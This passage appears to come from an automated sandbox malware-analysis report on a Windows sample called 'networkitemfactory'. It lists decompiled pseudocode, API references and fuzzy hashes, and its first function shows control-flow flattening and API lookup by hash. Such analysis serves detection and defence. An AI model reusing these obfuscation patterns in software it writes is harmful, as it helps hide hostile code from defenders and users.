                                                                                                      										 *0x20bdbec = _t52;
                                                                                                      									}
                                                                                                      									 *_t52(_t175, 0, _t177);
                                                                                                      									_t115 = _v1088;
                                                                                                      									_t43 = 0xfc8d800;
                                                                                                      									_t158 = _v1092;
                                                                                                      									_t168 = _v1072;
                                                                                                      									goto L3;
                                                                                                      								} else {
                                                                                                      									__eflags = _t43 - 0x2446b236;
                                                                                                      									if(_t43 == 0x2446b236) {
                                                                                                      										_t56 =  *0x20bddc8;
                                                                                                      										__eflags = _t56;
                                                                                                      										if(_t56 == 0) {
                                                                                                      											_t56 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0x298e8809, _t177);
                                                                                                      											 *0x20bddc8 = _t56;
                                                                                                      										}
                                                                                                      										_t176 =  *_t56();
                                                                                                      										_t58 =  *0x20bdbec;
                                                                                                      										__eflags = _t58;
                                                                                                      										if(_t58 == 0) {
                                                                                                      											_t58 = E020B3DD0(_t101, E020B3E70(0xbb51e2dc), 0x632f374, _t177);
                                                                                                      											 *0x20bdbec = _t58;
                                                                                                      										}
                                                                                                      										return  *_t58(_t176, 0, _t101);
                                                                                                      									}
                                                                                                      									__eflags = _t43 - 0x2a25fc8b;
                                                                                                      									if(_t43 != 0x2a25fc8b) {
                                                                                                      										goto L50;
                                                                                                      									} else {
                                                                                                      										_push(0);
                                                                                                      										_push(_t115);
                                                                                                      										E020B4AE0(_t101, 0,  &_v1044, _t177, 1);
                                                                                                      										_t115 = _v1076;
                                                                                                      										_t179 = _t179 + 0xc;
                                                                                                      										_t158 = _v1080;
                                                                                                      										_t43 = 0x303d5fe9;
                                                                                                      										goto L3;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							goto L60;
                                                                                                      							L50:
                                                                                                      							__eflags = _t43 - 0x3b079ae2;
                                                                                                      						} while (_t43 != 0x3b079ae2);
                                                                                                      						return _t43;
                                                                                                      						goto L60;
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}






















































                                                                                                      0x020b9fd0
                                                                                                      0x020b9fda
                                                                                                      0x020b9fde
                                                                                                      0x020b9fe3
                                                                                                      0x020b9fe7
                                                                                                      0x020b9fe7
                                                                                                      0x020b9fe7
                                                                                                      0x020b9ff0
                                                                                                      0x020b9ff4
                                                                                                      0x020b9ff4
                                                                                                      0x020ba000
                                                                                                      0x020ba000
                                                                                                      0x020ba000
                                                                                                      0x020ba000
                                                                                                      0x020ba005
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020ba00b
                                                                                                      0x020ba23b
                                                                                                      0x020ba240
                                                                                                      0x020ba242
                                                                                                      0x020ba255
                                                                                                      0x020ba25a
                                                                                                      0x020ba25a
                                                                                                      0x020ba261
                                                                                                      0x020ba263
                                                                                                      0x020ba268
                                                                                                      0x020ba26a
                                                                                                      0x020ba27d
                                                                                                      0x020ba282
                                                                                                      0x020ba282
                                                                                                      0x020ba28c
                                                                                                      0x020ba28e
                                                                                                      0x020ba290
                                                                                                      0x020ba294
                                                                                                      0x020ba296
                                                                                                      0x020ba449
                                                                                                      0x020ba29c
                                                                                                      0x020ba2a0
                                                                                                      0x020b9ff4
                                                                                                      0x020b9ff4
                                                                                                      0x00000000
                                                                                                      0x020b9ff8
                                                                                                      0x020b9ff4
                                                                                                      0x020ba011
                                                                                                      0x020ba011
                                                                                                      0x020ba016
                                                                                                      0x020ba1e8
                                                                                                      0x020ba1ed
                                                                                                      0x020ba21b
                                                                                                      0x020ba22a
                                                                                                      0x020ba231
                                                                                                      0x020b9ff4
                                                                                                      0x020b9ff4
                                                                                                      0x00000000
                                                                                                      0x020b9ff8
                                                                                                      0x020ba1ef
                                                                                                      0x020ba1ef
                                                                                                      0x020ba1f4
                                                                                                      0x00000000
                                                                                                      0x020ba1fa
                                                                                                      0x020ba1fc
                                                                                                      0x020ba205
                                                                                                      0x00000000
                                                                                                      0x020ba20a
                                                                                                      0x020ba1f4
                                                                                                      0x020ba01c
                                                                                                      0x020ba01c
                                                                                                      0x020ba0dd
                                                                                                      0x020ba0e3
                                                                                                      0x020ba0e8
                                                                                                      0x020ba0eb
                                                                                                      0x020ba0ef
                                                                                                      0x020ba0f1
                                                                                                      0x020ba104
                                                                                                      0x020ba109
                                                                                                      0x020ba109
                                                                                                      0x020ba10f
                                                                                                      0x020ba111
                                                                                                      0x020ba11e
                                                                                                      0x020ba122
                                                                                                      0x020ba124
                                                                                                      0x020ba13c
                                                                                                      0x020ba13e
                                                                                                      0x020ba13e
                                                                                                      0x020ba144
                                                                                                      0x020ba146
                                                                                                      0x020ba148
                                                                                                      0x020ba160
                                                                                                      0x020ba162
                                                                                                      0x020ba162
                                                                                                      0x020ba168
                                                                                                      0x020ba16a
                                                                                                      0x020ba16c
                                                                                                      0x020ba186
                                                                                                      0x020ba186
                                                                                                      0x020ba18c
                                                                                                      0x020ba192
                                                                                                      0x020ba194
                                                                                                      0x020ba1ac
                                                                                                      0x020ba1ae
                                                                                                      0x020ba1ae
                                                                                                      0x020ba1cb
                                                                                                      0x020ba1cd
                                                                                                      0x020ba1d7
                                                                                                      0x020ba1de
                                                                                                      0x00000000
                                                                                                      0x020ba022
                                                                                                      0x020ba027
                                                                                                      0x020ba0a1
                                                                                                      0x020ba0a6
                                                                                                      0x020ba0a8
                                                                                                      0x020ba0bb
                                                                                                      0x020ba0c0
                                                                                                      0x020ba0c0
                                                                                                      0x020ba0c9
                                                                                                      0x020ba0cb
                                                                                                      0x020ba0cf
                                                                                                      0x020ba0d4
                                                                                                      0x00000000
                                                                                                      0x020ba029
                                                                                                      0x020ba02e
                                                                                                      0x020ba3d1
                                                                                                      0x020ba3d4
                                                                                                      0x020ba3d9
                                                                                                      0x020ba3dc
                                                                                                      0x020ba3ec
                                                                                                      0x020ba034
                                                                                                      0x020ba039
                                                                                                      0x00000000
                                                                                                      0x020ba03f
                                                                                                      0x020ba049
                                                                                                      0x020ba04b
                                                                                                      0x020ba052
                                                                                                      0x020ba065
                                                                                                      0x020ba06a
                                                                                                      0x020ba06a
                                                                                                      0x020ba083
                                                                                                      0x020ba085
                                                                                                      0x020ba08a
                                                                                                      0x020ba08f
                                                                                                      0x020ba093
                                                                                                      0x020ba098
                                                                                                      0x020b9ff4
                                                                                                      0x020b9ff4
                                                                                                      0x00000000
                                                                                                      0x020b9ff4
                                                                                                      0x020b9ff4
                                                                                                      0x020ba039
                                                                                                      0x020ba02e
                                                                                                      0x020ba027
                                                                                                      0x020ba01c
                                                                                                      0x020ba016
                                                                                                      0x00000000
                                                                                                      0x020ba00b
                                                                                                      0x020ba2ae
                                                                                                      0x020ba2b3
                                                                                                      0x020ba35a
                                                                                                      0x020ba35f
                                                                                                      0x020ba3b8
                                                                                                      0x020ba3be
                                                                                                      0x020ba3c5
                                                                                                      0x020ba3c9
                                                                                                      0x00000000
                                                                                                      0x020ba361
                                                                                                      0x020ba361
                                                                                                      0x020ba366
                                                                                                      0x00000000
                                                                                                      0x020ba368
                                                                                                      0x020ba370
                                                                                                      0x020ba375
                                                                                                      0x020ba379
                                                                                                      0x020ba37c
                                                                                                      0x020ba382
                                                                                                      0x020ba389
                                                                                                      0x00000000
                                                                                                      0x020ba389
                                                                                                      0x020ba366
                                                                                                      0x020ba2b9
                                                                                                      0x020ba2b9
                                                                                                      0x020ba2f6
                                                                                                      0x020ba2fb
                                                                                                      0x020ba2fd
                                                                                                      0x020ba310
                                                                                                      0x020ba315
                                                                                                      0x020ba315
                                                                                                      0x020ba31c
                                                                                                      0x020ba31e
                                                                                                      0x020ba323
                                                                                                      0x020ba325
                                                                                                      0x020ba338
                                                                                                      0x020ba33d
                                                                                                      0x020ba33d
                                                                                                      0x020ba346
                                                                                                      0x020ba348
                                                                                                      0x020ba34c
                                                                                                      0x020ba351
                                                                                                      0x020b9ff4
                                                                                                      0x00000000
                                                                                                      0x020ba2bb
                                                                                                      0x020ba2bb
                                                                                                      0x020ba2c0
                                                                                                      0x020ba3ed
                                                                                                      0x020ba3f2
                                                                                                      0x020ba3f4
                                                                                                      0x020ba407
                                                                                                      0x020ba40c
                                                                                                      0x020ba40c
                                                                                                      0x020ba413
                                                                                                      0x020ba415
                                                                                                      0x020ba41a
                                                                                                      0x020ba41c
                                                                                                      0x020ba42f
                                                                                                      0x020ba434
                                                                                                      0x020ba434
                                                                                                      0x00000000
                                                                                                      0x020ba43d
                                                                                                      0x020ba2c6
                                                                                                      0x020ba2cb
                                                                                                      0x00000000
                                                                                                      0x020ba2d1
                                                                                                      0x020ba2d1
                                                                                                      0x020ba2d3
                                                                                                      0x020ba2dc
                                                                                                      0x020ba2e1
                                                                                                      0x020ba2e5
                                                                                                      0x020ba2e8
                                                                                                      0x020ba2ec
                                                                                                      0x00000000
                                                                                                      0x020ba2ec
                                                                                                      0x020ba2cb
                                                                                                      0x020ba2b9
                                                                                                      0x00000000
                                                                                                      0x020ba393
                                                                                                      0x020ba393
                                                                                                      0x020ba393
                                                                                                      0x020ba3a8
                                                                                                      0x00000000
                                                                                                      0x020ba3a8
                                                                                                      0x020b9ff4

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 020BA1C2
                                                                                                      • GetCurrentProcess.KERNEL32(00000000), ref: 020BA1C5
                                                                                                      • GetCurrentProcess.KERNEL32(00000000), ref: 020BA1C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, Offset: 020B0000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.519085712.00000000020B0000.00000004.00000001.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.519123055.00000000020BD000.00000004.00000001.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_20b0000_networkitemfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess
                                                                                                      • String ID: eE>2$_=0$_=0
                                                                                                      • API String ID: 2050909247-791634396
                                                                                                      • Opcode ID: 3590b35b0922b9c96ab6d432a5f2acc57ac2838e349ec63e2681341c4ef0f071
                                                                                                      • Instruction ID: 03b536b59c329dafaaf423846b27218e81164ab89bbda0b80fb67fc866a0ab72
                                                                                                      • Opcode Fuzzy Hash: 3590b35b0922b9c96ab6d432a5f2acc57ac2838e349ec63e2681341c4ef0f071
                                                                                                      • Instruction Fuzzy Hash: 0DB1C074B043058BDB7BEF689890AEE73E6AFC5650F20086AE455DB340EB34DD019B92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 71%
                                                                                                      			E004030AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				intOrPtr _t21;
                                                                                                      				intOrPtr _t27;
                                                                                                      				intOrPtr _t28;
                                                                                                      				intOrPtr _t36;
                                                                                                      				intOrPtr _t44;
                                                                                                      				void* _t45;
                                                                                                      				intOrPtr* _t47;
                                                                                                      				intOrPtr _t49;
                                                                                                      				void* _t51;
                                                                                                      				void* _t53;
                                                                                                      
                                                                                                      				_t45 = __edx;
                                                                                                      				_push(0xc);
                                                                                                      				_push(0x434250);
                                                                                                      				E00406830(__ebx, __edi, __esi);
                                                                                                      				_t49 =  *((intOrPtr*)(_t53 + 8));
                                                                                                      				if( *((intOrPtr*)(_t49 + 4)) != 0) {
                                                                                                      					L15:
                                                                                                      					_t21 =  *((intOrPtr*)(_t49 + 4));
                                                                                                      				} else {
                                                                                                      					_push(0x2800);
                                                                                                      					_push(E00402CB3);
                                                                                                      					_push(E004025D7);
                                                                                                      					_push(0);
                                                                                                      					_t21 = _t49 + 9;
                                                                                                      					_push(_t21);
                                                                                                      					_push(0);
                                                                                                      					"jdh EC"();
                                                                                                      					_t36 = _t21;
                                                                                                      					if(_t36 != 0) {
                                                                                                      						_t51 = E00406CD0(_t36);
                                                                                                      						while(_t51 != 0) {
                                                                                                      							_t51 = _t51 - 1;
                                                                                                      							if( *((char*)(_t51 + _t36)) == 0x20) {
                                                                                                      								 *((char*)(_t51 + _t36)) = 0;
                                                                                                      								continue;
                                                                                                      							}
                                                                                                      							L7:
                                                                                                      							E00406D5B(0xe);
                                                                                                      							 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
                                                                                                      							if( *((intOrPtr*)(_t49 + 4)) == 0) {
                                                                                                      								_t27 = E004025D7(_t36, _t45, _t49, 8);
                                                                                                      								 *((intOrPtr*)(_t53 - 0x1c)) = _t27;
                                                                                                      								if(_t27 != 0) {
                                                                                                      									_t52 = _t51 + 2;
                                                                                                      									_t28 = E004025D7(_t36, _t45, _t49, _t51 + 2);
                                                                                                      									 *((intOrPtr*)(_t49 + 4)) = _t28;
                                                                                                      									if(_t28 == 0) {
                                                                                                      										L13:
                                                                                                      										E00402CB3( *((intOrPtr*)(_t53 - 0x1c)));
                                                                                                      									} else {
                                                                                                      										if(E00406C6E(_t28, _t52, _t36) != 0) {
                                                                                                      											_push(0);
                                                                                                      											_push(0);
                                                                                                      											_push(0);
                                                                                                      											_push(0);
                                                                                                      											_push(0);
                                                                                                      											E00406C1E(_t36, _t45);
                                                                                                      											goto L13;
                                                                                                      										} else {
                                                                                                      											_t47 =  *((intOrPtr*)(_t53 - 0x1c));
                                                                                                      											 *_t47 =  *((intOrPtr*)(_t49 + 4));
                                                                                                      											_t44 =  *((intOrPtr*)(_t53 + 0xc));
                                                                                                      											 *((intOrPtr*)(_t47 + 4)) =  *((intOrPtr*)(_t44 + 4));
                                                                                                      											 *((intOrPtr*)(_t44 + 4)) = _t47;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							E00402CB3(_t36);
                                                                                                      							 *(_t53 - 4) = 0xfffffffe;
                                                                                                      							E00403194();
                                                                                                      							goto L15;
                                                                                                      						}
                                                                                                      						_t51 = _t51 - 1;
                                                                                                      						goto L7;
                                                                                                      					}
                                                                                                      				}
                                                                                                      				return E00406875(_t21);
                                                                                                      			}













                                                                                                      0x004030ac
                                                                                                      0x004030ac
                                                                                                      0x004030ae
                                                                                                      0x004030b3
                                                                                                      0x004030b8
                                                                                                      0x004030c0
                                                                                                      0x00403188
                                                                                                      0x00403188
                                                                                                      0x004030c6
                                                                                                      0x004030c6
                                                                                                      0x004030cb
                                                                                                      0x004030d0
                                                                                                      0x004030d5
                                                                                                      0x004030d6
                                                                                                      0x004030d9
                                                                                                      0x004030da
                                                                                                      0x004030db
                                                                                                      0x004030e3
                                                                                                      0x004030e7
                                                                                                      0x004030f4
                                                                                                      0x00403103
                                                                                                      0x004030f8
                                                                                                      0x004030fd
                                                                                                      0x004030ff
                                                                                                      0x00000000
                                                                                                      0x004030ff
                                                                                                      0x00403108
                                                                                                      0x0040310a
                                                                                                      0x00403110
                                                                                                      0x00403118
                                                                                                      0x0040311c
                                                                                                      0x00403122
                                                                                                      0x00403127
                                                                                                      0x00403129
                                                                                                      0x0040312d
                                                                                                      0x00403133
                                                                                                      0x00403138
                                                                                                      0x0040316b
                                                                                                      0x0040316f
                                                                                                      0x0040313a
                                                                                                      0x00403147
                                                                                                      0x00403161
                                                                                                      0x00403162
                                                                                                      0x00403163
                                                                                                      0x00403164
                                                                                                      0x00403165
                                                                                                      0x00403166
                                                                                                      0x00000000
                                                                                                      0x00403149
                                                                                                      0x0040314c
                                                                                                      0x0040314f
                                                                                                      0x00403151
                                                                                                      0x00403157
                                                                                                      0x0040315a
                                                                                                      0x0040315a
                                                                                                      0x00403147
                                                                                                      0x00403138
                                                                                                      0x00403127
                                                                                                      0x00403176
                                                                                                      0x0040317c
                                                                                                      0x00403183
                                                                                                      0x00000000
                                                                                                      0x00403183
                                                                                                      0x00403107
                                                                                                      0x00000000
                                                                                                      0x00403107
                                                                                                      0x004030e7
                                                                                                      0x00403190

                                                                                                      APIs
                                                                                                      • ___unDName.LIBCMT ref: 004030DB
                                                                                                      • _strlen.LIBCMT ref: 004030EE
                                                                                                      • __lock.LIBCMT ref: 0040310A
                                                                                                      • _malloc.LIBCMT ref: 0040311C
                                                                                                      • _malloc.LIBCMT ref: 0040312D
                                                                                                      • _free.LIBCMT ref: 00403176
                                                                                                        • Part of subcall function 00406C1E: IsProcessorFeaturePresent.KERNEL32(00000017,00406BF2,00000000,?,?,?,?,?,00406BFF,00000000,00000000,00000000,00000000,00000000,00405FFC), ref: 00406C20
                                                                                                      • _free.LIBCMT ref: 0040316F
                                                                                                        • Part of subcall function 00402CB3: HeapFree.KERNEL32(00000000,00000000,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CC7
                                                                                                        • Part of subcall function 00402CB3: GetLastError.KERNEL32(xuC,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CD9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3704956918-0
                                                                                                      • Opcode ID: 4982373046e5d6618406c5f35a984e0497dfac13016beb111cc1953250947740
                                                                                                      • Instruction ID: c0db6f7d0662a5cb01ac585c96d5be62debaf1bba68ce3c52ba4cfbe577086f4
                                                                                                      • Opcode Fuzzy Hash: 4982373046e5d6618406c5f35a984e0497dfac13016beb111cc1953250947740
                                                                                                      • Instruction Fuzzy Hash: 7C21F771904601BAD711AF358D46B6BBA98AF09315F10813FB819BB2C1DB7CDA41C69C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 91%
                                                                                                      			E0040435E(void* __ebx, void* __edi, void* __eflags) {
                                                                                                      				void* __esi;
                                                                                                      				void* _t3;
                                                                                                      				intOrPtr _t6;
                                                                                                      				long _t14;
                                                                                                      				long* _t27;
                                                                                                      
                                                                                                      				E00403B79(_t3);
                                                                                                      				if(E00406EAC() != 0) {
                                                                                                      					_t6 = E004062A5(E004040B9);
                                                                                                      					 *0x4351c0 = _t6;
                                                                                                      					__eflags = _t6 - 0xffffffff;
                                                                                                      					if(_t6 == 0xffffffff) {
                                                                                                      						goto L1;
                                                                                                      					} else {
                                                                                                      						_t27 = E0040CFF1(1, 0x3bc);
                                                                                                      						__eflags = _t27;
                                                                                                      						if(_t27 == 0) {
                                                                                                      							L6:
                                                                                                      							E004043D4();
                                                                                                      							__eflags = 0;
                                                                                                      							return 0;
                                                                                                      						} else {
                                                                                                      							__eflags = E00406301( *0x4351c0, _t27);
                                                                                                      							if(__eflags == 0) {
                                                                                                      								goto L6;
                                                                                                      							} else {
                                                                                                      								_push(0);
                                                                                                      								_push(_t27);
                                                                                                      								E004042AB(__ebx, __edi, _t27, __eflags);
                                                                                                      								_t14 = GetCurrentThreadId();
                                                                                                      								_t27[1] = _t27[1] | 0xffffffff;
                                                                                                      								 *_t27 = _t14;
                                                                                                      								__eflags = 1;
                                                                                                      								return 1;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				} else {
                                                                                                      					L1:
                                                                                                      					E004043D4();
                                                                                                      					return 0;
                                                                                                      				}
                                                                                                      			}








                                                                                                      0x0040435e
                                                                                                      0x0040436a
                                                                                                      0x00404379
                                                                                                      0x0040437e
                                                                                                      0x00404384
                                                                                                      0x00404387
                                                                                                      0x00000000
                                                                                                      0x00404389
                                                                                                      0x00404396
                                                                                                      0x0040439a
                                                                                                      0x0040439c
                                                                                                      0x004043cb
                                                                                                      0x004043cb
                                                                                                      0x004043d0
                                                                                                      0x004043d3
                                                                                                      0x0040439e
                                                                                                      0x004043ac
                                                                                                      0x004043ae
                                                                                                      0x00000000
                                                                                                      0x004043b0
                                                                                                      0x004043b0
                                                                                                      0x004043b2
                                                                                                      0x004043b3
                                                                                                      0x004043ba
                                                                                                      0x004043c0
                                                                                                      0x004043c4
                                                                                                      0x004043c8
                                                                                                      0x004043ca
                                                                                                      0x004043ca
                                                                                                      0x004043ae
                                                                                                      0x0040439c
                                                                                                      0x0040436c
                                                                                                      0x0040436c
                                                                                                      0x0040436c
                                                                                                      0x00404373
                                                                                                      0x00404373

                                                                                                      APIs
                                                                                                      • __init_pointers.LIBCMT ref: 0040435E
                                                                                                        • Part of subcall function 00403B79: RtlEncodePointer.NTDLL(00000000,?,00404363,00402B70,00434230,00000014), ref: 00403B7C
                                                                                                        • Part of subcall function 00403B79: __initp_misc_winsig.LIBCMT ref: 00403B97
                                                                                                        • Part of subcall function 00403B79: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00406461
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00406475
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00406488
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040649B
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004064AE
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004064C1
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004064D4
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004064E7
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004064FA
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0040650D
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00406520
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00406533
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00406546
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00406559
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0040656C
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0040657F
                                                                                                      • __mtinitlocks.LIBCMT ref: 00404363
                                                                                                      • __mtterm.LIBCMT ref: 0040436C
                                                                                                        • Part of subcall function 004043D4: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00406DC6
                                                                                                        • Part of subcall function 004043D4: _free.LIBCMT ref: 00406DCD
                                                                                                        • Part of subcall function 004043D4: DeleteCriticalSection.KERNEL32(xuC,?,?,00404371,00402B70,00434230,00000014), ref: 00406DEF
                                                                                                      • __calloc_crt.LIBCMT ref: 00404391
                                                                                                      • __initptd.LIBCMT ref: 004043B3
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004043BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3567560977-0
                                                                                                      • Opcode ID: 3339dd92b905196a4c42f06426374c0a1ac13dbf5bf5d1ed4aba601c44fe22ee
                                                                                                      • Instruction ID: ff0ecafb33dab0f9688af2411afeda57b66d43e85835077dd4caad25b267e939
                                                                                                      • Opcode Fuzzy Hash: 3339dd92b905196a4c42f06426374c0a1ac13dbf5bf5d1ed4aba601c44fe22ee
                                                                                                      • Instruction Fuzzy Hash: C7F0F6B22187121AE62437767C0374B3A90EF80738B20263FFA90F41D2EF7D9411425C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,LdrFindResource_U), ref: 00401BF4
                                                                                                      • GetProcAddress.KERNEL32(00000000,LdrAccessResource), ref: 00401BFE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: LdrAccessResource$LdrFindResource_U$ntdll.dll
                                                                                                      • API String ID: 190572456-309990276
                                                                                                      • Opcode ID: 374ed4848605be23ddd654ab2968cb408ecf5167f409eae68abec4d7f6b343ea
                                                                                                      • Instruction ID: 0be7b2e87ea625e9e257cfe7c5ec55fbb677ed6b4a9053280dbe75720fce2a0f
                                                                                                      • Opcode Fuzzy Hash: 374ed4848605be23ddd654ab2968cb408ecf5167f409eae68abec4d7f6b343ea
                                                                                                      • Instruction Fuzzy Hash: 2111CE71A4021DABDB00DFE9D981BAFBBF8AF08714F50406BE904F7280D67999058BA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 85%
                                                                                                      			E0040DCE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				signed int _t15;
                                                                                                      				signed int _t20;
                                                                                                      				signed int _t26;
                                                                                                      				void* _t30;
                                                                                                      				void* _t32;
                                                                                                      				signed int _t35;
                                                                                                      				void* _t36;
                                                                                                      
                                                                                                      				_t30 = __edx;
                                                                                                      				_t25 = __ebx;
                                                                                                      				_push(0xc);
                                                                                                      				_push(0x434600);
                                                                                                      				E00406830(__ebx, __edi, __esi);
                                                                                                      				 *(_t36 - 0x1c) = 0;
                                                                                                      				_t32 = E00404224();
                                                                                                      				_t26 =  *0x435d60; // 0xfffffffe
                                                                                                      				if(( *(_t32 + 0x70) & _t26) == 0 ||  *((intOrPtr*)(_t32 + 0x6c)) == 0) {
                                                                                                      					_t15 = E00406D5B(0xd);
                                                                                                      					 *((intOrPtr*)(_t36 - 4)) = 0;
                                                                                                      					_t35 =  *(_t32 + 0x68);
                                                                                                      					 *(_t36 - 0x1c) = _t35;
                                                                                                      					__eflags = _t35 -  *0x435794; // 0x536ce0
                                                                                                      					if(__eflags != 0) {
                                                                                                      						__eflags = _t35;
                                                                                                      						if(__eflags != 0) {
                                                                                                      							__eflags = _t15 | 0xffffffff;
                                                                                                      							asm("lock xadd [esi], eax");
                                                                                                      							if(__eflags == 0) {
                                                                                                      								__eflags = _t35 - 0x435570;
                                                                                                      								if(__eflags != 0) {
                                                                                                      									E00402CB3(_t35);
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						_t20 =  *0x435794; // 0x536ce0
                                                                                                      						 *(_t32 + 0x68) = _t20;
                                                                                                      						_t35 =  *0x435794; // 0x536ce0
                                                                                                      						 *(_t36 - 0x1c) = _t35;
                                                                                                      						asm("lock xadd [esi], eax");
                                                                                                      					}
                                                                                                      					 *((intOrPtr*)(_t36 - 4)) = 0xfffffffe;
                                                                                                      					E0040DD80();
                                                                                                      				} else {
                                                                                                      					_t35 =  *(_t32 + 0x68);
                                                                                                      				}
                                                                                                      				_t40 = _t35;
                                                                                                      				if(_t35 == 0) {
                                                                                                      					E00403A3B(_t25, _t30, _t32, _t35, _t40, 0x20);
                                                                                                      				}
                                                                                                      				return E00406875(_t35);
                                                                                                      			}










                                                                                                      0x0040dce3
                                                                                                      0x0040dce3
                                                                                                      0x0040dce3
                                                                                                      0x0040dce5
                                                                                                      0x0040dcea
                                                                                                      0x0040dcf1
                                                                                                      0x0040dcf9
                                                                                                      0x0040dcfb
                                                                                                      0x0040dd04
                                                                                                      0x0040dd24
                                                                                                      0x0040dd2a
